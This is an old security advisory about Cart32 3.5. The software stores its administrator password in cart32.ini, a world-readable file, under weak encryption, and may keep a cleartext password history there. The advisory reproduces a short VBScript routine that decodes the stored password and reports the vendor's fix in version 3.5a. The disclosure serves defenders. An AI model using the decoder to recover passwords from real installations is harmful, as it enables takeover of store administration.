Cart 32 Administrator Password is Vulnerable

Reported November 8, 2000 by Colin Hart

VERSIONS AFFECTED

DESCRIPTIONCart 32 version 3.5 creates a file cart32.ini which contains, in encrypted form, the administration password.  The encryption scheme used is very weak and can be broken.  In the debug section of the file, you may also find a password history in clear text.  The cart32.ini file resides in a world readable directory by default.

DEMONSTRATION

As requested by the vendor, Colin Hart did not provide the encryption algorithm used by Cart32.  However, Xato Network Security, in their release of additional Cart32 problems also released this VBScript that will demonstrate how the password could be de-encrypted;

Cart32Decode = Chr(Asc(Mid(sPass, 8)) - 12) & _Chr(Asc(Mid(sPass, 5)) - 8) & _Chr(Asc(Mid(sPass, 3)) - 16) & _Chr(Asc(Mid(sPass, 15)) - 15) & _Chr(Asc(Mid(sPass, 9)) - 9) & _Chr(Asc(Mid(sPass, 1)) - 12) & _Chr(Asc(Mid(sPass, 4)) - 3) & _Chr(Asc(Mid(sPass, 11)) - 5) & _Chr(Asc(Mid(sPass, 13)) - 11) & _Chr(Asc(Mid(sPass, 6)) - 5) & _Chr(Asc(Mid(sPass, 2)) - 1) & _Chr(Asc(Mid(sPass, 2)) - 1) & _Chr(Asc(Mid(sPass, 14)) - 13) & _Chr(Asc(Mid(sPass, 12)) - 10) & _Chr(Asc(Mid(sPass, 10)) - 6) & _Chr(Asc(Mid(sPass, 7)) - 8)

VENDOR RESPONSE

The Cart 32 team at McMurtrey/Whitaker & Associates has addressed these issues in the latest version 3.5a and has recommended that users read the knowledge base articles provided on their web site. http://www.cart32.com

CREDITDiscovered by Colin Hart